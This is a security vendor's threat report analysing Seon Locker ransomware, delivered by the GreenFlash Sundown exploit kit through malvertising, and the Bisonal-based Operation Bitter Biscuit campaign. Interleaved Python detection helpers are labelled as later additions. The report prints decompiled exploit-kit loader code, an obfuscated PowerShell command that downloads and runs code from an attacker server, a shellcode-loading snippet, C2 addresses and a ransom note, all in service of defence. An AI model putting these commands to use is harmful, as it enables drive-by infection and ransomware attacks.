Jan 07, 2019
ASEC REPORT Vol.93 | Security Trend
ASEC REPORT
VOL.93 Q4 2018
The AhnLab Security Emergency-response Center (ASEC) is a global security organization made up of security experts who protect customers from malware and security threats. This report was prepared by ASEC of AhnLab, Inc. and contains a summary of the latest security technologies that address the key security threats and issues of the quarter. For more information, visit ahnlab.com.
Q4 2018 Security Trends Table of Contents
Security Issue
SECURITY ISSUE
• Seon Locker Ransomware, Infected Just by Accessing a Website 04
Malware Analysis in Depth
ANALYSIS-IN-DEPTH
• Operation Bitter Biscuit Attack Trends in 2018 15
Security Issue
SECURITY ISSUE
• Seon Locker Ransomware, Infected Just by Accessing a Website
In the fourth quarter of 2018, a new ransomware, Seon Locker, was found. It was distributed by malvertising, a compound word of malware and advertising: the technique distributes ransomware through advertisements inserted in websites, and its effect is significant because the advertisement is exposed to every visitor. In particular, the ransomware discovered this time was found in affiliate advertisements, so the attacker is presumed to have targeted domestic (Korean) users. Also, because the drive-by download technique is used, users cannot easily recognize that they have been infected.
The AhnLab Security Emergency-response Center (ASEC) analyzed in detail the attack technique and attack procedure of the Seon Locker ransomware that was distributed through online advertisements.
01. Attack Overview
Figure 1-1 | Drive-By Download Overview
The attacker used the drive-by download technique to spread Seon Locker. As shown in [Figure 1-1], the technique works whether or not the user approves the download of a file. If the user approves the download, a file whose installation result the user does not know is downloaded, so the outcome differs from what the user intended. If the user does not approve the download, the download occurs anyway; in this case the attacker exploits security vulnerabilities in Internet Explorer, Adobe Flash Player, and Windows.
Figure 1-2 | Drive-By Download Attack Process (1)
The attacker uses an exploit kit, as shown in [Figure 1-2], to carry out the drive-by download attack. An exploit kit bundles scripts and malicious code that attack security vulnerabilities in programs. In this attack, the GreenFlash Sundown exploit kit was used.
Figure 1-3 | Drive-By Download Attack Process (2)
To launch the exploit kit, the user must visit a website where the malicious script is embedded. The attacker either creates a decoy site disguised as a normal site, as shown in [Figure 1-3], or hacks a legitimate site and inserts the malicious script into it. The attacker also used the malvertising technique, which abuses online advertising.
Figure 1-4 | Drive-By Download Attack Process (3)
Finally, when a user surfing the internet accesses the website where the script is embedded, the GreenFlash Sundown exploit hosted on the attacker's server is executed, as shown in [Figure 1-4]. If a security vulnerability exists on the user's system at this point, the system is infected with malicious code. Because drive-by download attacks work this way, it is not easy for the user to recognize that the system has been infected.
02. Attack Process
The attacker inserts a malicious script into a website in order to use the GreenFlash Sundown exploit kit. A characteristic point, as shown in [Figure 1-5], is that the attacker did not insert the script into every web page, but chose a web page with a high visit frequency. In addition, the malicious script embedded in a web page of a domestic media site redirects the user's browser (Internet Explorer) to the landing page of the GreenFlash Sundown exploit kit.
When the browser is connected to the landing page, the exploit kit checks the version of the program, since the chance of exploiting the Adobe Flash Player vulnerability depends on it. In the script used in this attack, the command is executed when the major version of Flash Player is 10 or more and 29 or less. [Table 1-1] shows part of the GreenFlash Sundown exploit kit landing page. If the condition is met and the command is executed, a malicious Flash file is executed; to bypass detection, the kit consists of a total of three Flash files.
Landing Page (ads.html)
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="400" height="400">
  <param name="movie" value="http://adop.us/show_ads.js" />
  <param name="play" value="true" />
  <param name="allowscriptaccess" value="always" />
Table 1-1 | GreenFlash Sundown Exploit Kit - Part of the landing page
First, in the first-stage Flash file, the connection address of the second-stage Flash file is stored in the string variable url. Because this string variable is encrypted with RC4, as shown in [Table 1-2], it is decrypted and stored back in the string variable url_dec. Next, the file generates a 10-character random string composed of upper- and lower-case letters and digits and stores it in the string variable key. The stored key is then encrypted with RSA using the attacker's public key, as shown in [Table 1-3], and the result is stored in the string variable token. The generated url_dec and token are combined to request the connection to the second-stage Flash file.
SWF File (show_ads.js)
var url:String = "B64Z5BF4fDB7eOg7J6BLc4o2aQUsCESreQ==";
var url_key:String = "QVNPbTIzbmxkMw==";
var url_key_byt:ByteArray = new ByteArray();
var key:String = generateRandomString(10);
key_byte = new ByteArray();
key_byte.writeMultiByte(key, "UTF8");
var token:String = processData(key);
key = "";
if (ActiveX == Capabilities.playerType)
{
    url_dec = Rc4(Base64.decodeToByteArray(url_key), Base64.decodeToByteArray(url));
    data_load = new URLLoader();
    data_load.dataFormat = URLLoaderDataFormat.BINARY;
    data_load.addEventListener(Event.COMPLETE, _jj18);
    _dv34 = new URLRequest(url_dec + "?token=" + encodeURIComponent(token));
    data_load.load(_dv34);
}
Table 1-2 | GreenFlash Sundown Exploit Kit - Flash File (Phase 1)
SWF File (show_ads.js)
var processData:Function = function(param1:String):String
{
    var _loc2_:String = "-----BEGIN PUBLIC KEY-----\n" + "MFswDQYJKoZIhvcNAQEBBQADSgAwRwJAbkQoqittIfJPWqUP/O45yh9ZfI8hAae2\n" + "f0F8OqSEHrUcRLfeZCxpwlJgJQS426HaIy/ifPsC3hDayKhO9yTpbwIDAQAB\n" + "-----END PUBLIC KEY-----";
    var _loc3_:ByteArray = new ByteArray();
    var _loc4_:ByteArray = new ByteArray();
    var _loc5_:String = "";
    var _loc6_:RSAKey = PEM.readRSAPublicKey(_loc2_);
    _loc3_ = Hex.toArray(Hex.fromString(param1));
    _loc6_.encrypt(_loc3_, _loc4_, _loc3_.length);
    _loc5_ = Base64.encodeByteArray(_loc4_);
    return _loc5_;
};
Table 1-3 | GreenFlash Sundown Exploit Kit - Flash File (Phase 1)
Landing Page (ads.js)
http://url_dec + "?token=" + encodeURIComponent(token)
→ http://adop[.]pro/index.php?token=YEFHWRKw0w5oNNECvY ... omitted ...
Table 1-4 | GreenFlash Sundown Exploit Kit - Flash File (Phase 1)
The request then connects to the attacker's server for the second-stage Flash file. The attacker's server decrypts the received token and recovers the key value. Using the restored key value, it encrypts the second-stage Flash file with RC4 and transmits it. This process is shown in [Figure 1-6].
Figure 1-6 | GreenFlash Sundown Exploit Kit - Flash File (Phase 1): the encrypted second-stage Flash file is sent, received, and decrypted
The received second-stage Flash file is decrypted and executed in memory. As shown in [Table 1-5], the second-stage Flash file stores the connection address of the third-stage Flash file in the string variable 'wewqqqww'. Since it is encrypted with RC4 as before, it is decrypted before use. A difference can be found in the key value used: in the first-stage Flash file the key value was a 10-character random string, whereas in the second-stage Flash file the link address of the third-stage Flash file is used as the key value.
SWF File (index.php)
jjeiejiee = new ByteArray();
var _ver1:Boolean = false;
var wewqqqww:String = "... Q ... omitted ..., 09090909090909 ... omitted ...";
var askjdskjw:Number = 0;
wewqqqww = wewqqqww.substr(0, wewqqqww.indexOf(","));
var kwkw:String = "21";
var ddds3:String = mnznnznxzxzxzx(wewqqqww, kwkw);
var sdkdjddd2:String = "";
sdkdjddd2 = ddds3.substr(7, ddds3.lastIndexOf("/") - 7);
kbkiuiuui = new ByteArray();
kbkiuiuui.writeUTFBytes(sdkdjddd2);
if (zxzxzzszx())
{
    zbzvzzzzzzx = new URLLoader();
    zbzvzzzzzzx.dataFormat = URLLoaderDataFormat.BINARY;
    zbzvzzzzzzx.addEventListener(Event.COMPLETE, zxxzxnmmzz);
    request = new URLRequest(mnznnznxzxzxzx(wewqqqww, kwkw));
    zbzvzzzzzzx.load(request);
}
var zxzxzzszx:Function = function():Boolean
{
    var _loc1_:String = Capabilities.version;
    _loc1_ = _loc1_.substr(4);
    _loc1_ = _loc1_.replace(/[,]/g, "");
    var _loc2_:uint = uint(_loc1_);
    if (!§§pop())
    {
        return false;
    }
    if (_loc2_ < 2800164)
    {
        if (_loc2_ > 2100164)
        {
        }
        return true;
    }
    return false;
};
Table 1-5 | GreenFlash Sundown Exploit Kit - Flash File (Phase 2)
Also, before connecting to the third-stage Flash file, the second-stage Flash file checks the version of the Flash Player installed at that time. As shown in [Table 1-5], if the version is higher than 28.00.164, the third-stage Flash file is not connected.
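As an added example (not code from the report or from the exploit kit), the following Python reproduces the Phase 2 version check of [Table 1-5] so a defender can see which Capabilities.version strings the kit accepted, and sets it beside a field-by-field version comparison; the decompiler residue (§§pop and the empty inner if) is ignored, and the sample version strings are constructed.

```python
import re
from typing import Tuple

KIT_UPPER_BOUND = 2800164          # the literal in the decompiled check: if (_loc2_ < 2800164)
KIT_CUTOFF = (28, 0, 0, 164)       # the same number read as a real version


def kit_version_number(capabilities_version: str) -> int:
    """Replicate the SWF: substr(4) drops the platform prefix ('WIN ', 'MAC ', 'LNX '),
    replace(/[,]/g, '') removes the commas, uint() parses what is left (0 if not numeric)."""
    digits = capabilities_version[4:].replace(",", "")
    return int(digits) if digits.isdigit() else 0


def kit_would_proceed(capabilities_version: str) -> bool:
    """True when the Phase 2 file would go on to fetch the Phase 3 exploit file."""
    return kit_version_number(capabilities_version) < KIT_UPPER_BOUND


def parse_version(capabilities_version: str) -> Tuple[int, ...]:
    """Proper field-by-field reading, e.g. 'WIN 28,0,0,137' -> (28, 0, 0, 137)."""
    return tuple(int(p) for p in re.findall(r"\d+", capabilities_version[4:]))


def below_cutoff(capabilities_version: str) -> bool:
    """Field-by-field comparison against 28.0.0.164, what the kit's check is meant to express."""
    return parse_version(capabilities_version) < KIT_CUTOFF


# Constructed sample strings in the format Capabilities.version returns.
SAMPLES = ["WIN 28,0,0,137", "WIN 28,0,0,164", "MAC 30,0,0,113", "WIN 29,0,0,1"]

if __name__ == "__main__":
    for s in SAMPLES:
        # The last sample shows the quirk: '29,0,0,1' becomes 29001, which is 'below' 2800164,
        # so the digit-concatenation check is not a real version comparison.
        print(s, kit_version_number(s), kit_would_proceed(s), below_cutoff(s))
```

The last sample shows that the concatenated number is not a version comparison: a build such as 29.0.0.1 still passes the kit's check even though it is newer than the cutoff.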
The third-stage Flash file, shown in [Figure 1-7], contains shellcode that exploits the Adobe Flash Player security vulnerability CVE-2018-4878. When the shellcode executes, it runs the command in [Table 1-6] on the system.
Figure 1-7 | GreenFlash Sundown Exploit Kit - Flash File (Phase 3)
Command Line
cmd.exe /q /c "powErShEll.ExE -nop -w hIddEn -c $J=nEw-objEct nEt.wEbclIEnt;$J.proxy=[NEt.WEbREquESt]::GEtSyStEmWEbProxy();$J.Proxy.CrEdEntIalS=[NEt.CrEdEntIalCacheE]::DEfaultCrEdEntIalS;IEX $J.downloadStrIng('http://lloydss.bestdealsadvbiz.space/index.php');" ... (script omitted) ...
Table 1-6 | Command information
Command Line
[Byte[]]$key = [System.Text.Encoding]::ASCII.GetBytes("LU5V")
$m = New-Object System.Net.WebClient;
[Byte[]]$data = $m.DownloadData("http://lloydss.bestdealsadvbiz.space/index.php?mk=" + $av_base + "&sq=" + $vm_base)
[Byte[]]$iJF = rc4 $data $key
$b0Z = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((mu kernel32.dll VirtualAlloc), (k9no_ @([IntPtr], [UInt32], [UInt32], [UInt32]))).Invoke([IntPtr]::Zero, $iJF.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($iJF, 0, $b0Z, $iJF.Length)
Table 1-7 | Part of the decrypted index.php page
Once the command is executed, PowerShell, the scripting environment built into the Windows operating system, requests the data needed for malicious code execution from the attacker's server. The data received from the attacker's server is again Base64-encoded and Gzip-compressed, so it must be decoded. Part of the decoded data, shown in [Table 1-7], contains code that decrypts RC4 encryption, checks whether an anti-virus product (Windows Defender) is installed, and holds the URL address used to download the encoded binary. Finally, the file downloaded from that URL carries out the malicious behavior on the user's system.
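As an added example (not from the report), the following Python detection logic normalizes the letter case of a process command line, since the command in [Table 1-6] randomizes case, and flags the download-cradle pattern it shows; the telemetry records are constructed, and the URL in them is a placeholder.

```python
import re
from typing import List, Set, Tuple

# Traits of the download cradle in Table 1-6, as regexes over a case-normalised command line.
# -nop / -w hidden are PowerShell switch abbreviations; the rest are the .NET calls the cradle needs.
INDICATORS = {
    "no_profile": r"-nop(rofile)?\b",
    "hidden_window": r"-w(indowstyle)?\s+hidden",
    "webclient": r"new-object\s+net\.webclient",
    "system_proxy": r"getsystemwebproxy\(",
    "download_string": r"\.downloadstring\(",
    "invoke_expression": r"\biex\b|invoke-expression",
}


def normalise(cmdline: str) -> str:
    """Lower-case and collapse whitespace: the kit randomises letter case to evade exact matches."""
    return re.sub(r"\s+", " ", cmdline).lower()


def match_indicators(cmdline: str) -> Set[str]:
    """Names of the cradle traits present in the command line."""
    text = normalise(cmdline)
    return {name for name, pattern in INDICATORS.items() if re.search(pattern, text)}


def is_download_cradle(cmdline: str, min_hits: int = 3) -> bool:
    """Flag a PowerShell command line that shows at least min_hits cradle traits (assumed threshold)."""
    text = normalise(cmdline)
    return "powershell" in text and len(match_indicators(text)) >= min_hits


# Constructed process-creation records (parent image, command line); the URL is a placeholder.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    ("cmd.exe",
     "powErShEll.ExE -nop -w hIddEn -c $J=nEw-objEct nEt.wEbclIEnt;"
     "$J.proxy=[NEt.WEbREquESt]::GEtSyStEmWEbProxy();"
     "IEX $J.downloadStrIng('http://example.invalid/index.php');"),
    ("explorer.exe", "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"),
    ("services.exe", "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"),
]


def triage(events: List[Tuple[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (parent image, sorted matched traits) for every flagged event."""
    return [(parent, sorted(match_indicators(cmd))) for parent, cmd in events if is_download_cradle(cmd)]


if __name__ == "__main__":
    for parent, traits in triage(SAMPLE_EVENTS):
        print(parent, traits)
```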
Figure 1-8 | Encoded binary and decoded binary
The encoded binaries verified so far are GandCrab ransomware and Seon Locker ransomware. The downloaded version of GandCrab is v5.04; details can be found on the ASEC blog.
Meanwhile, the Seon Locker ransomware found this time behaves as follows. First, through PowerShell, the additionally encoded binary is decoded. Afterwards, the shellcode searches from the MZ header until it finds the string 'dave' and copies the binary into memory. This means that no file is created on disk, which is one of the features of Seon Locker ransomware.
Also, in order to check whether the system has already been infected with Seon Locker ransomware, it first checks whether a key exists at the registry path in [Table 1-8]. If the registry key is already present, nothing new is written; if there is no key value, it generates 0x30 bytes of random data, XORs them with the string fixt_rBHZ1htKFbhxSIjZ, encodes the result, and stores the data in the registry value as in [Figure 1-9]. The value stored in the registry is used later for decoding.
Registry path
HKEY_CURRENT_USER\Software\GUN\Display\windowData
Table 1-8 | Registry path
Figure 1-9 | Registry value
Seon Locker ransomware uses the GetDriveTypeW API to enumerate drives from A:\ to Z:\ and selects drives of type DRIVE_FIXED and DRIVE_REMOTE as encryption targets. The drive path search process is shown in [Figure 1-10]. It also checks file names to determine what to encrypt, converting every string to lowercase before comparison. Therefore, the strings stored in the malicious code for exclusion from encryption are all lowercase.
Excluded from encryption
Folders and files
system volume information
programdata
application data
$windows.~bt
program files
tor browser
windows
mozilla
appdata
windows.old
program files (x86)
$recycle.bin
google
boot
bootsect.bak
ntuser.ini
thumbs.db
your_files_are_encrypted.txt
ntldr
iconcache.db
desktop.ini
ntuser.dat.log
bootfont.bin
ntuser.dat
boot.ini
autorun.inf
Extensions
mod adv dll msstyles mpa nomedia ocx cmd ps1 themepack sys prf diagcfg cab ldf diagpkg icl 386 ico cur ics ani bat com rtp diagcab nls msc deskthemepack idx msp msu cpl bin shs wpx icns exe rom theme hlp spl fixt lnk scr drv
Table 1-9 | Excluded folders, files, and extensions
Figure 1-10 | Drive Path Search
Finally, Seon Locker ransomware encrypts the remaining files except for the exclusion targets of [Table 1-9] and appends .FIXT to the file name. Because fixt is included in the excluded extensions, files that have already been encrypted are not encrypted again. In addition, regardless of file encryption, Seon Locker ransomware creates the ransom note file 'YOUR_FILES_ARE_ENCRYPTED.TXT' in each folder it enters, and when infection of the system is complete it disappears from memory. The ransom note is shown in [Table 1-10].
YOUR_FILES_ARE_ENCRYPTED.TXT
SEON RANSOMWARE
all your files are encrypted
There is only one way to get your files back: contact with us, pay and get decryptor software
We accept Bitcoin and other cryptocurrencies
You can decrypt 1 file for free
write email to kleomicro@gmail.com or kleomicro@dicksinhisan.us
Table 1-10 | Ransom note
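As an added example (not the report's code), the following Python scoping helper applies the exclusion rules of [Table 1-9] and the .FIXT rule above to a constructed file listing, so an incident responder can estimate which files Seon Locker would have skipped on an infected host; it assumes the malware matches whole lower-cased path components exactly, which the report does not state.

```python
from typing import List, Optional, Tuple

# Exclusion lists from Table 1-9, kept lower-case as the report says the malware stores them.
EXCLUDED_FOLDERS = {
    "system volume information", "programdata", "application data", "$windows.~bt",
    "program files", "tor browser", "windows", "mozilla", "appdata", "windows.old",
    "program files (x86)", "$recycle.bin", "google", "boot",
}
EXCLUDED_FILES = {
    "bootsect.bak", "ntuser.ini", "thumbs.db", "your_files_are_encrypted.txt", "ntldr",
    "iconcache.db", "desktop.ini", "ntuser.dat.log", "bootfont.bin", "ntuser.dat",
    "boot.ini", "autorun.inf",
}
EXCLUDED_EXTENSIONS = set(
    "mod adv dll msstyles mpa nomedia ocx cmd ps1 themepack sys prf diagcfg cab ldf "
    "diagpkg icl 386 ico cur ics ani bat com rtp diagcab nls msc deskthemepack idx "
    "msp msu cpl bin shs wpx icns exe rom theme hlp spl fixt lnk scr drv".split()
)


def _components(path: str) -> List[str]:
    """Split a Windows path on either separator and lower-case each component,
    mirroring the report's note that every string is lower-cased before comparison."""
    return [p.lower() for p in path.replace("\\", "/").split("/") if p]


def skip_reason(path: str) -> Optional[str]:
    """Return why Seon Locker would leave this file alone, or None if it is in scope.
    Assumption (not stated in the report): each path component is matched exactly."""
    parts = _components(path)
    if not parts:
        return None
    name, folders = parts[-1], parts[:-1]
    for folder in folders:
        if folder in EXCLUDED_FOLDERS:
            return "folder:" + folder
    if name in EXCLUDED_FILES:
        return "file:" + name
    ext = name.rsplit(".", 1)[1] if "." in name else ""
    if ext in EXCLUDED_EXTENSIONS:   # 'fixt' here is why already-encrypted files are not re-encrypted
        return "extension:" + ext
    return None


def scope_listing(paths: List[str]) -> Tuple[List[str], List[Tuple[str, str]]]:
    """Partition a file listing into (would be encrypted, skipped with reason)."""
    encrypted, skipped = [], []
    for p in paths:
        reason = skip_reason(p)
        if reason is None:
            encrypted.append(p)
        else:
            skipped.append((p, reason))
    return encrypted, skipped


# Constructed sample listing from a hypothetical infected host (not data from the report).
SAMPLE_LISTING = [
    r"C:\Windows\System32\notepad.exe",
    r"C:\Users\alice\AppData\Roaming\notes.txt",
    r"C:\Users\alice\Desktop\YOUR_FILES_ARE_ENCRYPTED.TXT",
    r"D:\Backups\report.docx",
    r"D:\Backups\report.docx.FIXT",
    r"D:\Backups\photos\trip.jpg",
]

if __name__ == "__main__":
    enc, skip = scope_listing(SAMPLE_LISTING)
    print("would be encrypted:", enc)
    print("skipped:", skip)
```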
As we have seen, this ransomware targeted domestic websites, and a user who is unaware of this may be infected with ransomware simply by accessing a website. To prevent such ransomware infections, continued PC management is required, such as installing security updates regularly and keeping anti-virus software and applications up to date.
The V3 product line detects Seon Locker ransomware with the following detection names.
<V3 product detection names>
• Malware/Gen.Generic (2018.10.25.00)
• Powershell/Seoncrypt (2018.11.16.00)
• BinImage/EncPE (2018.11.16.00)
• Malware/MDP.Ransom.M1996
Malware Analysis in Depth
ANALYSIS-IN-DEPTH
• Operation Bitter Biscuit Attack Trends in 2018
The so-called 'Operation Bitter Biscuit' is an attack campaign that has intensified since 2011. Using Bisonal-type malware, it has targeted major domestic organizations such as the military and the defense industry over a long period. This attack, which had been in a lull since the fall of 2017, was observed again in 2018. Meanwhile, the Bisonal-type malware used in the attack has been associated with a large number of attack groups. AhnLab also discussed the attack behavior of Operation Bitter Biscuit in the ASEC Report for the third quarter of 2017.
In this report, the AhnLab Security Emergency-response Center (hereinafter ASEC) focuses on the actual attacks in Korea in 2018 and looks at the attack trends and attack techniques of Operation Bitter Biscuit.
01. Operation Bitter Biscuit Attack Trend
Bisonal-type malware, first discovered in 2010, is mainly used in Operation Bitter Biscuit attacks and has so far appeared in attacks against Korea, Japan, India, and Russia. In Korea it was first used in 2011, and the following year, 2012, it was used to attack Japan's defense industry. Meanwhile, in 2015, India's CERT warned about a Bisonal variant, Bioazih.[1]
Analysis of the attack trend of Operation Bitter Biscuit confirmed that Bisonal-type malware was actively used in the attacks. From 2011 to spring 2012, the attacks concentrated on domestic institutions, and attacks on domestic companies and military-related companies continued between 2013 and 2015. In 2016 and 2017, attacks on defense companies and their affiliates were carried out. In 2018, the attacks concentrated on the domestic maritime sector, so the attacker appears to be gradually expanding its targets. Because Operation Bitter Biscuit has continued over such a long period, the group behind it has been analyzed and tracked continuously.
02. Domestic Attack Cases in 2018
[Table 2-1] summarizes the major attacks of Operation Bitter Biscuit in 2018 as a timeline. The attacks, which had been quiet since 2017, began again in the spring of 2018. Attacks on the domestic maritime sector were confirmed from March to July 2018.
Time | Attack target | Details
March 2018 | Unknown (presumed maritime sector) | Attack attempt with a .scr file; creates a downloader
March 2018 | Marine Police Agency | Attack attempt with a file named 'Government officials (grade 9) (2018.03.05).pdf.exe'; creates a backdoor
March 2018 | Unknown (presumed maritime sector) | Attack with a file named 'medium bulletproof service line 1.pdf.exe'; creates a backdoor
July 2018 | Unknown (presumed maritime sector) | Disguised as documents related to maritime companies; creates a packed downloader
September 2018 | Korean government | Only the backdoor was found
Table 2-1 | Major attack timeline in 2018
A characteristic of the attacks in 2018 is that the attacker uses a new dropper. When the newly changed dropper is run, it drops a decoy document that attracts the user's attention, malicious code, and VBS (Visual Basic Script) files.
From the decoy documents of the malware found in 2018, shown in [Figure 2-1], it can be confirmed which targets the attacks concentrated on.
Figure 2-1 | Decoy documents of malware found in 2018
The malicious code generated by the dropper is either a downloader that downloads additional malicious code or a backdoor that executes remote commands. Some of the malicious code found appends garbage values to the end of the file, creating large files of tens of megabytes and up to 100 megabytes in length. Meanwhile, in the case of the VBS files, the script is divided into two parts: one that shows the decoy document, and one that deletes the dropped dropper and the executed VBS file itself.
03. Malware Analysis
Let's take a look at the dropper, downloader, and backdoor used in the 2018 Operation Bitter Biscuit attack.
3-1) Dropper Analysis
The 'Scratchback.scr' file found on March 5, 2018 was used as the dropper. The basic information of the dropper is shown in [Table 2-2].
File name | Scratchback.scr
File length | 260,968
File creation time | December 26, 2015 22:01:29 (UTC)
MD5 | e5a8c1df0360baeeeab767d8422cc58f
SHA1 | 0ba6787751e7e80c0911f666fd42a175dd419e0e
SHA256 | 013c87898926de3f6cc8266c79c7888d92eb1546a49493d1433b8261d2e41e77
Main functions and features | Creates a decoy document, an executable file, and VBS files (dropper)
Detection name | Dropper/Win32.Bisonal
Table 2-2 | Dropper basic information
When the dropper is executed, a decoy document, an executable file, and VBS files are generated as shown in [Figure 2-2].
As mentioned earlier, the decoy documents make it possible to infer the attack targets, and all of these documents concern the domestic maritime sector. The executable file is either the downloader or the backdoor. The two VBS files are divided into one that opens the decoy document in the Office program and one that deletes the dropper file.
3-2) Downloader Analysis
The main function of the downloader used in this attack is to check the name of the file that was executed and, if it is not services.exe, to generate a services.exe file in a path such as c:\Users\[Username]\Applications\Microsoft. At this time, garbage values are appended to the end of the file so that the generated file is about 4 MB in length. The basic information of the downloader is shown in [Table 2-3].
File name | 3.tmp
File length | 10,752
File creation time | February 25, 2018 00:21:33 (UTC)
MD5 | d198e4632f9c4b9a3efbd6b1ed378d26
SHA1 | bb8be657e4bf1eb9a89ae66cb6c8a8d6baa934d4
SHA256 | 4652882a64cc8fe823ab6d7c2166f1dbf9b75794d024ddbfaa173b6f9107a19f
Main functions and features | Generates services.exe with a length of 4 megabytes or more; saves system information as ms.log; downloads additional malware
Detection name | Trojan/Win32.Bisdow
Table 2-3 | Downloader basic information
Figure 2-2 | Malware composition
[Figure 2-3] compares the original file with the file generated by the downloader with garbage values appended. It is presumed that the attacker creates such arbitrary files to make it difficult to find the malicious code by its hash value. Some variants created files of about 100 MB in length.
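Because the report says the downloader pads its generated file with garbage to defeat hash lookups, an added example (not the report's or AhnLab's code) measures the overlay of a PE file, that is, the bytes beyond the last section's raw data, as a triage signal for such padding; the minimal PE produced by build_sample_pe is constructed sample input, and the 1 MiB threshold in looks_padded is an assumption.

```python
import struct

DOS_HEADER_LEN = 64
COFF_HEADER_LEN = 20
SECTION_HEADER_LEN = 40
FILE_ALIGNMENT = 512


def pe_overlay_size(data: bytes) -> int:
    """Bytes appended after the last section's raw data (the 'overlay').

    Parses only the fields needed to walk the section table, so it works for
    PE32 and PE32+. Raises ValueError for buffers that are not a PE image.
    """
    if len(data) < DOS_HEADER_LEN or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 60)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    section_table = coff + COFF_HEADER_LEN + size_of_optional
    # The headers alone already occupy this much; section data can only extend it.
    end_of_image = section_table + num_sections * SECTION_HEADER_LEN
    for i in range(num_sections):
        hdr = section_table + i * SECTION_HEADER_LEN
        # Section header offsets 16 and 20: SizeOfRawData, PointerToRawData.
        size_raw, ptr_raw = struct.unpack_from("<II", data, hdr + 16)
        end_of_image = max(end_of_image, ptr_raw + size_raw)
    if end_of_image > len(data):
        raise ValueError("section data extends past end of file (truncated image)")
    return len(data) - end_of_image


def looks_padded(data: bytes, min_overlay: int = 1024 * 1024) -> bool:
    """Triage predicate: True when the overlay is at least min_overlay bytes (assumed 1 MiB)."""
    return pe_overlay_size(data) >= min_overlay


def build_sample_pe(section_bytes: bytes, overlay: bytes) -> bytes:
    """Constructed, non-runnable PE32 layout with one section, used only as sample input."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", DOS_HEADER_LEN)   # e_lfanew at offset 60
    size_of_optional = 224                                            # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, size_of_optional, 0x0102)
    optional = struct.pack("<H", 0x10B) + b"\0" * (size_of_optional - 2)
    headers_len = DOS_HEADER_LEN + 4 + COFF_HEADER_LEN + size_of_optional + SECTION_HEADER_LEN
    raw_ptr = (headers_len + FILE_ALIGNMENT - 1) // FILE_ALIGNMENT * FILE_ALIGNMENT
    section = (b".text".ljust(8, b"\0")
               + struct.pack("<IIII", len(section_bytes), 0x1000, len(section_bytes), raw_ptr)
               + b"\0" * 16)
    headers = (dos + b"PE\0\0" + coff + optional + section).ljust(raw_ptr, b"\0")
    return headers + section_bytes + overlay


if __name__ == "__main__":
    padded = build_sample_pe(b"\x90" * 100, b"\x41" * (4 * 1024 * 1024))
    print("overlay bytes:", pe_overlay_size(padded), "padded:", looks_padded(padded))
```

Signed binaries and self-extracting installers legitimately carry an overlay (the Authenticode signature or the archive), so a large overlay is a reason to look closer, not a verdict on its own.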
The downloader checks whether the name of the executed file is services.exe, registers services.exe in the registry, and creates a Windows Message.lnk file. The contents of the Windows Message LNK file are shown in [Figure 2-4]; it is a shortcut to the malicious services.exe.
Figure 2-4 | LNK file contents
Figure 2-3 | Original file and generated file with garbage values appended
Figure 2-5 | System information collection contents
It also uses ipconfig.exe and net.exe to store system information in the ms.log file and then sends it to http://mp.motlat.com/info/wel.gif. [Figure 2-5] shows the collected system information.
A feature seen only in the downloader variants found in 2018 is that, when attempting to download additional files, the downloader checks whether it is running in a virtual environment by looking at the disk name, as shown in [Figure 2-6]. Variants discovered before 2018 do not have this virtual environment check.
Figure 2-6 | Virtual environment check
The downloader downloads the MsUpdata.exe file from http://mp.motlat.com/lvs/tips.htm. As a result of the analysis, we found that an msupdata.exe (2c0522a805fa845ec9385eb5400e8d16) file had been distributed. msupdata.exe is also a downloader that downloads other malware, but in the end no malicious code was downloaded.
3-3) Backdoor Analysis
In 2018, a backdoor file was created via a similar dropper. Malicious code related to this backdoor was discovered in the fall of 2014, and Bisonal variants were also found at the same attack targets. The basic information of the backdoor is shown in [Table 2-4].
File name | 3.tmp
File length | 28,672 bytes
File creation time | February 10, 2018 04:10:36 (UTC)
MD5 | fc78fff75df0291d8c514f595f68c654
SHA1 | aec101161bdfada59b93ef47f1b814e4fea54c9e
SHA256 | 6631d7045a2209ca5dbcf5071cb97eaea8cfba2e875a75e5535ba9180aaaf8d1
Main functions and features | Backdoor
Detection name | Backdoor/Win32.Bisoaks
Table 2-4 | Backdoor basic information
These Bisoaks malicious codes, which are Bisonal variants, are characterized by strings such as 'axpbu.txt' and 'mismyou', as shown in [Figure 2-7]. However, some of the malware is packed with PECompact or MPRESS, so the strings cannot be checked directly.
When the malicious code is executed, it registers the executed file under the value mismyou in the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.
Finally, Bisoaks malware executes commands received from the C&C server: collecting system information, collecting the process list, terminating processes, downloading files, and executing files. In some variants, a self-deletion function was also confirmed.
04. Relationship
Analysis of the Operation Bitter Biscuit attacks in 2018 shows that the dropper used in this attack is presumed to be malicious code newly produced by the attacker. In the case of the downloader and the backdoor, however, they are connected to earlier malware. The Bisoaks malware, a Bisonal variant, was used to attack the same place in 2014 and in 2018 with variants that share the same code. [Figure 2-8] is a relationship diagram of the malicious code used in the operation.
Figure 2-7 | Characteristic strings of Bisoaks malware
The code similarity between the downloaders found in 2014 (fd45ecc5b111948507ace52fc95253ae) and 2018 can be seen in [Figure 2-9].
Figure 2-8 | Malware used in the 2018 attacks
Some variants have download addresses associated with Korea, from which it can be inferred that Korea is a major attack target. In addition, as shown in [Figure 2-10], there is a downloader (00c479bf76dc90db51209d2fa2a9cf6a) that contains a fake certificate disguised as a digital signature.
Figure 2-9 | 2014 and 2018 downloader string comparison
Figure 2-10 | A downloader file pretending to carry the digital signature of AAPL
The Bisoaks backdoor discovered in 2018 is related to the variant detected in 2014 (45a416f10ccb2c31ff391e61a7584f1f); as shown in [Figure 2-11], it is confirmed that they contain similar strings.
Figure 2-11 | Characteristic string of the 2014 Bisoaks variant
